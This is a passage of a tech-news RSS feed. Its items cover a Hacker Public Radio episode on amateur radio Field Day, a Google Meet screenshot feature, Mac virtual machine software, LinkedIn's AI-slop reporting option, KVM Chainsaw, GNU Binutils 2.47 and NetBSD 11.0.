In this episode, the ARRL Field Days was in the past month, so I thought this would be a good time to highlight events in the US as well as around the world.









...]]></description>
<link>https://tsecurity.de/de/3699673/podcasts/hpr4693-amateur-radio-field-days/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699673/podcasts/hpr4693-amateur-radio-field-days/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:34 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

Hi, this is Archer72 for another episode of Hacker Public Radio.
</p>

<p>

In this episode, the ARRL Field Days was in the past month, so I thought this would be a good time to highlight events in the US as well as around the world.
</p>

<p>

</p>

<p>

<a href="https://en.wikipedia.org/wiki/Field_Day_(amateur_radio)" rel="noopener noreferrer" target="_blank" data-darkreader-inline-color="">
Field Day (amateur radio : edited on 4 June 2026, at 13:51)</a>

</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_1.png">
<img src="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_1_tn.png">
</a>

</p>

<p>

</p>

<p>

<a href="https://www.pmg-ky3.com/cynthiana/features/community/experience-the-power-of-ham-radio-at-2025-arrl-field-day/article_d5e7efeb-58d0-5d3e-bd76-281c8e1c925f.html" rel="noopener noreferrer" target="_blank" data-darkreader-inline-color="">
Experience the power of ham radio at 2025 ARRL Field Day Harrison County Amateur Radio Club Jun 12, 2025 </a>

</p>

<p>

<a href="https://www.pmg-ky3.com/cynthiana/features/community/experience-the-power-of-ham-radio-at-2025-arrl-field-day/article_d5e7efeb-58d0-5d3e-bd76-281c8e1c925f.html" rel="noopener noreferrer" target="_blank" data-darkreader-inline-color="">
Updated Jun 17, 2025</a>

</p>

<p>

</p>

<p>

<a href="https://www.pmg-ky3.com/cynthiana/features/community/amateur-radio-club-to-host-annual-field-day/article_029c5efb-5a3b-5754-a596-373725457dad.html" rel="noopener noreferrer" target="_blank" data-darkreader-inline-color="">
Amateur Radio Club to host annual field day By Keith Clifford Harrison County Amateur Radio Club Jun 15, 2026</a>

</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_2.png">
<img src="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_2_tn.png">
</a>

</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_3.png">
<img src="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_3_tn.png">
</a>

</p>

<p>

</p>

<p>

<a href="https://www.pmg-ky3.com/cynthiana/features/community/harrison-county-amateur-radio-club-field-day/article_0af0f246-9904-5803-85c9-fafd20f5aa5f.html" rel="noopener noreferrer" target="_blank" data-darkreader-inline-color="">
Harrison County Amateur Radio Club Field Day Jun 22, 2026</a>

</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_4.png">
<img src="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_4_tn.png">
</a>

</p>

<p>

</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_5.png">
<img src="https://hackerpublicradio.org/eps/hpr4693/hpr4693_image_5_tn.png">
</a>

</p>

<p>

</p>

<p>
Preceding collage used with permission by Keith Clifford of the Harrison County Amateur Radio Club (K4HSN)</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4693/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4691: Viva la Coda]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.

    
      C++ is a high-level, general-purpose programming language created
      by Danish computer scientist Bjarne Stroustrup. First released in
      1985 as an extension of the C programming language, adding
      object-oriented (OOP) featu...]]></description>
<link>https://tsecurity.de/de/3699675/podcasts/hpr4691-viva-la-coda/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699675/podcasts/hpr4691-viva-la-coda/</guid>
<pubDate>Mon, 03 Aug 2026 00:16:34 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

    <p>
      C++ is a high-level, general-purpose programming language created
      by Danish computer scientist Bjarne Stroustrup. First released in
      1985 as an extension of the C programming language, adding
      object-oriented (OOP) features, it has since expanded
      significantly over time adding more OOP and other features</p>
    <p>
    </p>
    <p>
      - from <a href="https://en.wikipedia.org/wiki/Main_Page">https://en.wikipedia.org/wiki/Main_Page</a></p>
    <p>
    </p>
    <p>
      Serenity OS - <a href="https://serenityos.org/">https://serenityos.org</a></p>
    <p>
    </p>
    <p>
      The C Programming Language, Kernighan and Ritchie -</p>
    <p>
    </p>
    <p><a href="https://colorcomputerarchive.com/repo/Documents/Books/The%20C%20Programming%20Language%20%28Kernighan%20Ritchie%29.pdf">https://colorcomputerarchive.com/repo/Documents/Books/The%20C%20Programming%20Language%20%28Kernighan%20Ritchie%29.pdf</a></p>
    <p>
    </p>
    <p>
      C++ - <a href="https://en.wikipedia.org/wiki/C%2B%2B">https://en.wikipedia.org/wiki/C%2B%2B</a></p>
    <p>
    </p>
    <p>
      The Ghost of Unix SVR4 - <a href="https://github.com/macsplit/unix_doc">https://github.com/macsplit/unix_doc</a></p><p><a href="https://hackerpublicradio.org/eps/hpr4691/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual screenshots in Google Meet meeting notes will soon be generally available, pre-configure admin settings in advance]]></title>
<description><![CDATA[In the coming weeks, we’re starting the rollout of visual screenshots for the ‘Take notes for me’ feature in Google Meet. Visual screenshots automatically capture presented content (such as slides, diagrams, and charts) directly into the generated meeting notes document, ensuring critical visual ...]]></description>
<link>https://tsecurity.de/de/3699225/web-tipps/visual-screenshots-in-google-meet-meeting-notes-will-soon-be-generally-available-pre-configure-admin-settings-in-advance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699225/web-tipps/visual-screenshots-in-google-meet-meeting-notes-will-soon-be-generally-available-pre-configure-admin-settings-in-advance/</guid>
<pubDate>Mon, 03 Aug 2026 00:15:34 +0200</pubDate>
<content:encoded><![CDATA[<p>In the coming weeks, we’re starting the rollout of visual screenshots for the ‘Take notes for me’ feature in Google Meet. Visual screenshots automatically capture presented content (such as slides, diagrams, and charts) directly into the generated meeting notes document, ensuring critical visual context is preserved alongside spoken summaries and transcripts.</p><p>Ahead of the general availability rollout, admins can decide whether visual screenshots of presented content are allowed in meeting notes for their users and pre-configure their preferred setting in advance. Admin controls can be configured to either always allow screenshots of presented content (default) or only allow them when a meeting recording is enabled.</p><p><br></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBCcf2DgoyALZfGoWleTCCD9yLjN3LfyrumoIGs9dRTYYByQAS8Dah9HI5G9lMmy1c7G0q682Khv-SZvMXFQumHoS9hUamjlo3CR1GvR0kpUePlR3llUdf72YUS53Oebuwfr5NtEEaOGFHo9xQopisIgWdyeQf-yurWQ9JXDtqeELLYymZo3hHbutaQs/s2048/Visual%20screenshots%20in%20Google%20Meet%20meeting%20notes%20will%20soon%20be%20generally%20available,%20pre-configure%20admin%20settings%20in%20advance%20-%206637.png"><img border="0" data-original-height="612" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFBCcf2DgoyALZfGoWleTCCD9yLjN3LfyrumoIGs9dRTYYByQAS8Dah9HI5G9lMmy1c7G0q682Khv-SZvMXFQumHoS9hUamjlo3CR1GvR0kpUePlR3llUdf72YUS53Oebuwfr5NtEEaOGFHo9xQopisIgWdyeQf-yurWQ9JXDtqeELLYymZo3hHbutaQs/s1600/Visual%20screenshots%20in%20Google%20Meet%20meeting%20notes%20will%20soon%20be%20generally%20available,%20pre-configure%20admin%20settings%20in%20advance%20-%206637.png"></a></div><p><br></p><p>We’ll share another update on the Workspace Updates blog with more details when visual screenshots begin rolling out to end users.</p><h4>Visual Context in Meeting Notes</h4><p>While meeting transcripts accurately capture what is said during a call, they don’t currently include visual context—such as presented slides, financial charts, or architecture diagrams. Visual screenshots will soon be automatically embedded into the Google Doc created by “Take notes for me”.</p><h4>Data Protections and Privacy Controls</h4><p></p><ul><li><b>Presenter Notifications: </b>When a user begins presenting in a meeting where Take Notes for me is active, an on-screen notification will alert the presenter that Gemini may capture screenshots of the presentation to include in the meeting notes document.</li><li><b>In-Meeting End-User Control: </b>Presenters and end users can manage or disable visual screenshot capture at any time directly from the Google Meet notes panel.</li><li><b>Enterprise Data Protections:</b> Visual screenshots captured during meetings are covered by Google Workspace enterprise-grade data protections.</li></ul><p></p><h3>Getting started</h3><p></p><ul><li><b>Admins: </b>Admin settings are available starting today. You can <a href="https://knowledge.workspace.google.com/admin/meet/let-google-meet-ai-take-notes-for-my-users" target="_blank">configure visual screenshot settings</a> in the Admin console at the domain, Organizational Unit (OU), or group level. Navigate to Apps &gt; Google Workspace &gt; Google Meet to choose between allowing screenshots always or only when recording is enabled. </li><li><b>End users: </b>There is no end user action required at this time. When the feature officially rolls out, presenters will receive a notification when presenting during a meeting with note-taking enabled and can manage setting preferences from the <a href="https://support.google.com/meet/answer/14754931#zippy=%2Coptional-customizable-settings" target="_blank">notes panel</a>.</li></ul><p></p><h3>Rollout pace</h3><p></p><b>Admin Console Settings</b><br><ul><li><b><a href="https://support.google.com/a/answer/172177" target="_blank">Rapid Release and Scheduled Release domains</a>: </b>Available now.</li></ul><b>End-User Feature Rollout</b><br><ul><li><b><a href="https://support.google.com/a/answer/172177" target="_blank">Rapid Release and Scheduled Release domains</a>:</b> Gradual rollout (up to 15 days for feature visibility) in Q3 2026. We’ll share another update on the Workspace Updates blog with more details when visual screenshots begin rolling out to end users.</li></ul><p></p><h3>Availability</h3><p></p><ul><li><b>Business: </b>Business Standard and Plus</li><li><b>Enterprise: </b>Enterprise Standard and Plus</li><li><b>Education: </b>Google AI Pro for Education</li></ul><p></p><h3>Resources</h3><p></p><ul><li>Google Workspace Admin Help: <a href="https://knowledge.workspace.google.com/admin/meet/let-google-meet-ai-take-notes-for-my-users" target="_blank">Let Google Meet AI take notes for my users</a></li></ul><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond Preview: How UPDF brings PDF editing, conversion, OCR, and AI to Mac and iPad]]></title>
<description><![CDATA[While Preview can do a lot to a PDF, sometimes you need more. UPDF can help with more advanced PDF capabilities, as a cheaper alternative to Adobe Acrobat.UPDF 2.5 is a cost-effective alternative to Adobe Acrobat - Image credit: UPDFPreview is a frequently used tool for Mac users, providing a qui...]]></description>
<link>https://tsecurity.de/de/3699158/ios-mac-os/beyond-preview-how-updf-brings-pdf-editing-conversion-ocr-and-ai-to-mac-and-ipad/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699158/ios-mac-os/beyond-preview-how-updf-brings-pdf-editing-conversion-ocr-and-ai-to-mac-and-ipad/</guid>
<pubDate>Mon, 03 Aug 2026 00:15:26 +0200</pubDate>
<content:encoded><![CDATA[While Preview can do a lot to a PDF, sometimes you need more. UPDF can help with more advanced PDF capabilities, as a cheaper alternative to Adobe Acrobat.<br><br><div><img src="https://media.appleinsider.com/gallery/68371-144098-cover-image-appleinsider-updf-xl.jpg" alt="Laptop and tablet displaying modern PDF documents with charts and architecture, accompanied by text reading AI-powered PDF editor and the UPDF logo on a clean, minimalist background"><br><span>UPDF 2.5 is a cost-effective alternative to Adobe Acrobat - Image credit: UPDF</span></div><br>Preview is a frequently used tool for Mac users, providing a quick and lightweight way to look at documents. It's also got editing capabilities, so you can mark up or add signatures to forms without much effort.<br><br><br> <a href="https://appleinsider.com/articles/26/07/28/beyond-preview-how-updf-brings-pdf-editing-conversion-ocr-and-ai-to-mac-and-ipad?utm_source=rss">Continue Reading on AppleInsider</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Virtual Machine Software for Mac in 2026]]></title>
<description><![CDATA[The best virtual machine software for Mac lets you run Windows, Linux, older operating systems, and isolated development environments without replacing macOS.



Parallels Desktop offers the easiest Windows experience, while VMware Fusion provides powerful virtualization tools for free. UTM is a ...]]></description>
<link>https://tsecurity.de/de/3699008/ios-mac-os/best-virtual-machine-software-for-mac-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699008/ios-mac-os/best-virtual-machine-software-for-mac-in-2026/</guid>
<pubDate>Mon, 03 Aug 2026 00:15:20 +0200</pubDate>
<content:encoded><![CDATA[The best virtual machine software for Mac lets you run Windows, Linux, older operating systems, and isolated development environments without replacing macOS.



Parallels Desktop offers the easiest Windows experience, while VMware Fusion provides powerful virtualization tools for free. UTM is a strong open-source option, and VirtualBox remains useful for cross-platform testing.



Your Mac’s processor affects which operating systems it can run efficiently. Apple silicon Macs, including M1 through M5 models, deliver the best performance with ARM-based guest operating systems. Intel-based systems can run traditional x86 and x64 operating systems directly.



Best Virtual Machine Software for Mac Compared



Virtual machine softwareBest forApple silicon supportPriceMain limitationParallels DesktopRunning Windows easilyYesPaidSubscription costVMware Fusion ProFree professional virtualizationYesFreeLess polished Windows integrationUTMOpen-source virtualization and emulationYesFreeLimited graphics accelerationVirtualBoxCross-platform testingLimited but improvingFreeSeveral Apple silicon limitationsTartmacOS and Linux automationYesFreeCommand-line focused



⭐ 1. Parallels Desktop: Best Overall (We Recommend)







Parallels Desktop is the best choice for most people who need to run Windows on a Mac regularly. It provides a guided Windows 11 installation, shared folders, clipboard synchronization, drag-and-drop file transfers, and support for Mac peripherals.



Its Coherence mode hides the Windows desktop and displays Windows applications alongside regular Mac applications. You can open Windows software from the Dock, use macOS keyboard shortcuts, and access files stored on your Mac from inside Windows.



Parallels supports Windows 11 on Arm on Apple silicon Macs. Microsoft recognizes Windows 11 Pro and Enterprise running through Parallels as a compatible solution for Apple silicon systems.




    

    
        Parallels Desktop
        
            Run Windows on your Mac without rebooting. Our top recommendation for Apple silicon and Intel Macs.
        
    

    
        Free Trial
        
            Visit Website
        
    




Key Parallels Desktop features include:




One-click Windows 11 installation



Coherence mode for running Windows apps without displaying the complete Windows desktop



Shared Mac and Windows folders



DirectX 11 graphics support



USB device and printer sharing



Virtual machine snapshots



Retina display optimization



Development tools in the Pro edition




Parallels works well for Microsoft Office, business applications, web development, accounting software, testing, and many standard Windows programs. However, some applications that depend on unsupported hardware drivers, nested virtualization, specialised security components, or certain anti-cheat systems may not work correctly with Windows 11 on Arm.



Parallels requires a paid licence, and Windows activation usually requires a separate Windows licence. The Standard edition suits home users, while the Pro edition provides more processor, memory, networking, debugging, and automation controls.



2. VMware Fusion Pro: Best Free Virtual Machine Software for Mac







VMware Fusion Pro is the best free alternative to Parallels Desktop. Broadcom made Fusion Pro free for personal, educational, and commercial users, removing the previous paid licence requirement.



Fusion supports Windows 11 for Arm, Linux distributions, snapshots, virtual networks, cloning, encryption, and advanced hardware configuration. It also offers DirectX 11 graphics acceleration and fast file sharing on supported guest systems.



VMware Fusion Pro includes:




Windows 11 on Arm support



Multiple snapshots



Linked and full virtual machine clones



Custom virtual networking



Virtual disk encryption



3D graphics acceleration



Shared folders and clipboard integration



Import support for several virtual machine formats




Fusion gives developers and IT professionals more configuration options than most free tools. It works well for testing software, creating isolated networks, running Linux servers, examining suspicious files, and reproducing enterprise environments.



The setup process feels less straightforward than Parallels, particularly for people installing Windows for the first time. Downloads also require a Broadcom account. However, Fusion delivers excellent value because the Pro edition is free for all supported uses.



3. UTM: Best Open-Source Virtual Machine Software for Mac







UTM is a free and open-source virtual machine application built specifically for Apple platforms. It uses Apple’s Hypervisor framework to virtualize ARM64 operating systems at near-native speeds on Apple silicon Macs.



UTM can also emulate processors that do not match the Mac’s hardware architecture. For example, it can emulate an x86 system on an Apple silicon Mac, allowing you to experiment with older versions of Windows or specialised Linux distributions.



Supported architectures include:




ARM64



x86 and x86-64



ARM32



PowerPC



MIPS



RISC-V




Virtualization provides much better performance when the guest and host processor architectures match. Emulation translates instructions between different architectures, which requires considerably more processing power.



UTM provides downloadable configurations for Windows, Ubuntu, Debian, Kali Linux, Arch Linux, and other operating systems. Its Windows 11 configuration supports ARM64 and recommends 8GB of virtual memory.



UTM suits students, developers, security researchers, and enthusiasts who want more control without paying for a commercial product. Its graphics performance and desktop integration generally fall behind Parallels, so it is less suitable for demanding Windows applications or 3D software.



4. Oracle VirtualBox: Best for Cross-Platform Test Environments







VirtualBox has long been a popular free virtualization tool for Windows, Linux, and Intel-based Macs. It offers snapshots, shared folders, command-line management, virtual networking, and portable virtual disk formats.



Oracle now provides an Arm64 package for Apple silicon Macs, but the Apple silicon version still has several restrictions. Oracle documents limitations involving audio, storage, graphics, Guest Additions, unattended installation, and saved states on Arm hosts.



VirtualBox remains useful when a development team needs similar virtual machine configurations across multiple host operating systems. It also works well for lightweight Linux testing, training labs, network experiments, and older Intel Mac environments.



Mac users with Apple silicon should choose VirtualBox only after confirming that it supports the required guest operating system and features. VMware Fusion or UTM generally provides a more complete experience on current Macs.



5. Tart: Best for Developers and Continuous Integration







Tart is a specialised virtualization tool for building, running, and managing macOS and Linux virtual machines on Apple silicon. It focuses on command-line workflows, automation, reproducible images, and continuous integration rather than general desktop use.



Developers can clone prepared virtual machine images, run automated tests, create clean macOS environments, and integrate virtual machines into CI pipelines. Tart requires an Apple silicon Mac running macOS 13 Ventura or later.



Tart is a good option for:




Testing Mac applications across clean environments



Running automated macOS builds



Creating self-hosted CI runners



Managing reusable macOS and Linux images



Reproducing development environments




It does not aim to provide the simple Windows experience found in Parallels, and its command-line workflow makes it unsuitable for many casual users.



What to Check Before Installing a Virtual Machine



Before choosing virtual machine software, check your Mac’s processor, available memory, storage capacity, and required guest operating system.



An Apple silicon Mac should use ARM64 versions of Windows and Linux whenever possible. Parallels requires an Arm-based installation image when creating a Windows virtual machine on Apple silicon.



For comfortable performance, consider these starting allocations:



Guest operating systemRecommended RAMRecommended storageWindows 118GB or more64GB or moreDesktop Linux4GB or more30GB or moreLinux server2GB or more20GB or moremacOS testing VM8GB or more60GB or more



Avoid assigning all available processor cores or memory to the virtual machine because macOS still needs enough resources to remain responsive. A Mac with 16GB of unified memory can handle one moderate virtual machine, while 24GB or 32GB provides more room for development tools and multiple environments.



Which Mac Virtual Machine Software Should You Choose?



Choose Parallels Desktop when you want the easiest and most polished way to run Windows applications. VMware Fusion Pro is the strongest free option for developers, IT professionals, and users comfortable configuring virtual machines manually.



UTM works well for open-source virtualization, processor emulation, and older operating systems. VirtualBox remains useful for portable cross-platform labs, although its Apple silicon support has important limitations. Tart is the right choice for automated macOS and Linux testing on Apple silicon.



For most Mac users, Parallels Desktop provides the best overall experience. VMware Fusion Pro offers the best balance of advanced features and zero licence cost.]]></content:encoded>
</item>
<item>
<title><![CDATA[LinkedIn Now Lets Users Flag Low-Quality AI Posts In Their Feeds]]></title>
<description><![CDATA[People are tired of seeing generic, machine-written posts taking over their daily feeds. LinkedIn is finally doing something about the massive flood of fake content on its platform. The company just rolled out a new reporting option that lets users quickly flag posts that look like they were writ...]]></description>
<link>https://tsecurity.de/de/3699037/ios-mac-os/linkedin-now-lets-users-flag-low-quality-ai-posts-in-their-feeds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3699037/ios-mac-os/linkedin-now-lets-users-flag-low-quality-ai-posts-in-their-feeds/</guid>
<pubDate>Mon, 03 Aug 2026 00:15:20 +0200</pubDate>
<content:encoded><![CDATA[People are tired of seeing generic, machine-written posts taking over their daily feeds. LinkedIn is finally doing something about the massive flood of fake content on its platform. The company just rolled out a new reporting option that lets users quickly flag posts that look like they were written by a machine. This update gives everyone a simple, direct tool to help clean up the site.



How the new reporting button works to hide bad posts



When users see a post that feels heavily padded with AI-generated lists or excessive emojis, they can take immediate action. By clicking the three-dot menu at the top of any update, a new option called "Seems like AI slop" now appears in the list.



Selecting this button hides the content from view and sends a signal directly to the platform. According to the product team, this feedback helps the system learn how to recognize and hide bad posts over time. Since Microsoft owns the professional networking site, the parent company is likely monitoring how well this user moderation performs.



The platform shifts focus toward authentic and human-written conversations



The site is dealing with a huge volume of computer-written text right now. Recent estimates suggest a large portion of long posts on the platform are generated by artificial intelligence tools. To fix this, LinkedIn is changing how it encourages content creation.



Instead of writing entire posts for you, the site is reportedly replacing its built-in text generation features with a basic proofreading tool. The software will now help check your spelling and grammar to keep things sounding natural.



This change shows a growing realization that computer tools cannot replace real human connection. If a social network becomes nothing but machines talking to other machines, the site loses its main purpose. Letting people filter out the junk is a smart step toward keeping professional chats authentic and useful.]]></content:encoded>
</item>
<item>
<title><![CDATA[HBO Max Shorts brings vertical, AI-picked clips to iPhone]]></title>
<description><![CDATA[HBO Max Shorts is a new video feed being tested on iPhone in the U.S. The hook? The videos being shown are vertical. 
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.)]]></description>
<link>https://tsecurity.de/de/3698975/ios-mac-os/hbo-max-shorts-brings-vertical-ai-picked-clips-to-iphone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698975/ios-mac-os/hbo-max-shorts-brings-vertical-ai-picked-clips-to-iphone/</guid>
<pubDate>Mon, 03 Aug 2026 00:15:19 +0200</pubDate>
<content:encoded><![CDATA[<div><img width="780" height="439" src="https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-1440x810.jpg" class="attachment-large size-large wp-post-image" alt="A picture of HBO Max Shorts used in a story about the feature coming to select iOS users." decoding="async" loading="lazy" srcset="https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-1440x810.jpg.webp 1440w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-400x225.jpg 400w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-768x432@2x.jpg.webp 1536w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-2048x1152.jpg 2048w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-350x197.jpg 350w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-768x432.jpg.webp 768w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-1020x574.jpg.webp 1020w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-2040x1147.jpg.webp 2040w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-1920x1080.jpg 1920w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-1440x810@2x.jpg.webp 2880w, https://www.cultofmac.com/wp-content/uploads/2026/07/shorts_static-2-400x225@2x.jpg 800w" sizes="auto, (max-width: 780px) 100vw, 780px"></div>
<p>HBO Max Shorts is a new video feed being tested on iPhone in the U.S. The hook? The videos being shown are vertical. </p>
<p>(via <a href="https://www.cultofmac.com/">Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['KVM Chainsaw' Expected to Hit Linux 7.3 For Dealing with 'God Data Structure']]></title>
<description><![CDATA[An anonymous reader shared this report from Phoronix:


A patch series that appears destined for the upcoming Linux 7.3 merge window is what's dubbed the "KVM Chainsaw" as a major code clean-up in dealing with the kvm_mmu "god data structure". Red Hat engineer and KVM maintainer Paolo Bonzini has...]]></description>
<link>https://tsecurity.de/de/3698911/linux-tipps/kvm-chainsaw-expected-to-hit-linux-73-for-dealing-with-god-data-structure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698911/linux-tipps/kvm-chainsaw-expected-to-hit-linux-73-for-dealing-with-god-data-structure/</guid>
<pubDate>Mon, 03 Aug 2026 00:14:28 +0200</pubDate>
<content:encoded><![CDATA[An anonymous reader shared this report from Phoronix:


A patch series that appears destined for the upcoming Linux 7.3 merge window is what's dubbed the "KVM Chainsaw" as a major code clean-up in dealing with the kvm_mmu "god data structure". Red Hat engineer and KVM maintainer Paolo Bonzini has merged the kvm-chainsaw branch to KVM's "next" Git branch. With this KVM Chainsaw work now in the next branch, it should be submitted for the upcoming Linux 7.3 cycle. 

The KVM Chainsaw work deals with the kvm_mmu structure being overloaded with multiple uses and splits it down into three parts for better handling current KVM usage. Paolo explains of KVM Chainsaw with the merge to the KVM.git next branch: 


"The kvm_mmu is a "god data structure" that includes three different tasks: describing the guest page table's format, walking the guest page tables and building the page tables. This means that the (already poorly named) nested_mmu is only used in part, since it has no page tables to construct. Furthermore, some parts are reused across guest and host page tables (such as the reserved bits detector) but others are not; for example permission_fault is replaced by simplified code such as is_executable_pte(). 

This series cleans this up by splitting kvm_mmu in three parts...

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status='KVM+Chainsaw'+Expected+to+Hit+Linux+7.3+For+Dealing+with+'God+Data+Structure'%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F27%2F0246233%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F07%2F27%2F0246233%2Fkvm-chainsaw-expected-to-hit-linux-73-for-dealing-with-god-data-structure%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/07/27/0246233/kvm-chainsaw-expected-to-hit-linux-73-for-dealing-with-god-data-structure?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GNU Binutils 2.47 Released with New RISC-V Features, Linker Improvements, and Reproducible Builds]]></title>
<description><![CDATA[by George Whittaker
      
            The GNU Project has officially released GNU Binutils 2.47, the latest version of its essential collection of binary development tools for Linux and other Unix-like systems. The release delivers numerous bug fixes alongside new assembler, linker, and disassem...]]></description>
<link>https://tsecurity.de/de/3698808/unix-server/gnu-binutils-247-released-with-new-risc-v-features-linker-improvements-and-reproducible-builds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698808/unix-server/gnu-binutils-247-released-with-new-risc-v-features-linker-improvements-and-reproducible-builds/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:14 +0200</pubDate>
<content:encoded><![CDATA[<div data-history-node-id="1341449" class="layout layout--onecol">
    <div class="layout__region layout__region--content">
      
            <div class="field field--name-field-node-image field--type-image field--label-hidden field--item">  <img loading="lazy" src="https://www.linuxjournal.com/sites/default/files/nodeimage/story/gnu-binutils-2-47-released-with-new-risc-v-features-linker-improvements-and-reproducible-builds.jpg" width="850" height="500" alt="GNU Binutils 2.47 Released with New RISC-V Features, Linker Improvements, and Reproducible Builds" typeof="foaf:Image" class="img-responsive"></div>
      
            <div class="field field--name-node-author field--type-ds field--label-hidden field--item">by <a title="View user profile." href="https://www.linuxjournal.com/users/george-whittaker" lang="" about="https://www.linuxjournal.com/users/george-whittaker" typeof="schema:Person" property="schema:name" datatype="" xml:lang="">George Whittaker</a></div>
      
            <div class="field field--name-body field--type-text-with-summary field--label-hidden field--item"><p>The GNU Project has officially released <strong>GNU Binutils 2.47</strong>, the latest version of its essential collection of binary development tools for Linux and other Unix-like systems. The release delivers numerous bug fixes alongside new assembler, linker, and disassembler capabilities, expanded RISC-V support, reproducible source archives, and continued modernization of the GNU toolchain.</p>

<p>Used by developers worldwide, GNU Binutils forms a core part of the software development ecosystem, providing the low-level tools needed to assemble, link, inspect, and manipulate executable programs and object files.</p>

<h2><strong>What Is GNU Binutils?</strong></h2>

<p>GNU Binutils is a collection of command-line utilities that work closely with compilers such as GCC and Clang. While a compiler translates source code into object files, Binutils provides the tools needed to transform those object files into executable programs and libraries.</p>

<p>The package includes well-known utilities such as:</p>

<ul><li><code>ld</code> (GNU Linker)</li>
	<li><code>as</code> (GNU Assembler)</li>
	<li><code>objdump</code></li>
	<li><code>objcopy</code></li>
	<li><code>readelf</code></li>
	<li><code>nm</code></li>
	<li><code>strip</code></li>
	<li><code>ar</code></li>
	<li><code>strings</code></li>
</ul><p>Together, these tools are used daily by Linux distributions, embedded developers, operating system projects, and software engineers building applications in C, C++, Rust, Go, and many other languages.</p>

<h2><strong>Expanded Support for RISC-V</strong></h2>

<p>One of the biggest improvements in Binutils 2.47 is expanded support for the rapidly growing <strong>RISC-V</strong> architecture.</p>

<p>The release adds support for several additional standard RISC-V extensions, allowing developers targeting modern RISC-V processors to work with newer instruction sets and hardware capabilities. These additions continue the GNU toolchain's strong commitment to one of the fastest-growing open processor architectures.</p>

<p>As more Linux distributions, development boards, and enterprise hardware adopt RISC-V, keeping development tools current is becoming increasingly important.</p>

<h2><strong>New Assembler Options</strong></h2>

<p>GNU Assembler (<code>gas</code>) gains several useful enhancements in version 2.47.</p>

<p>Among the most notable is a new command-line option:</p>

<ul><li><code>--reloc-section-sym=[all|internal|none]</code></li>
</ul><p>This option gives developers finer control over how relocations referencing locally bound symbols are converted to section symbols, improving flexibility for certain assembly and linking workflows.</p>

<p>The release also introduces numerous assembler improvements across multiple CPU architectures.</p>

<h2><strong>Better Disassembly for AArch64</strong></h2>

<p>Developers working with Arm-based systems also benefit from new functionality.</p></div>
      
            <div class="field field--name-node-link field--type-ds field--label-hidden field--item">  <a href="https://www.linuxjournal.com/content/gnu-binutils-247-released-new-risc-v-features-linker-improvements-and-reproducible-builds" hreflang="en">Go to Full Article</a>
</div>
      
    </div>
  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[BSD Release: NetBSD 11.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The NetBSD project has announced the release of NetBSD 11.0, the 19th major release of the highly portable operating system. The new version includes a port to the RISC-V architecture, better Linux compatibility, and a virt68k port...]]></description>
<link>https://tsecurity.de/de/3698781/unix-server/bsd-release-netbsd-110/</link>
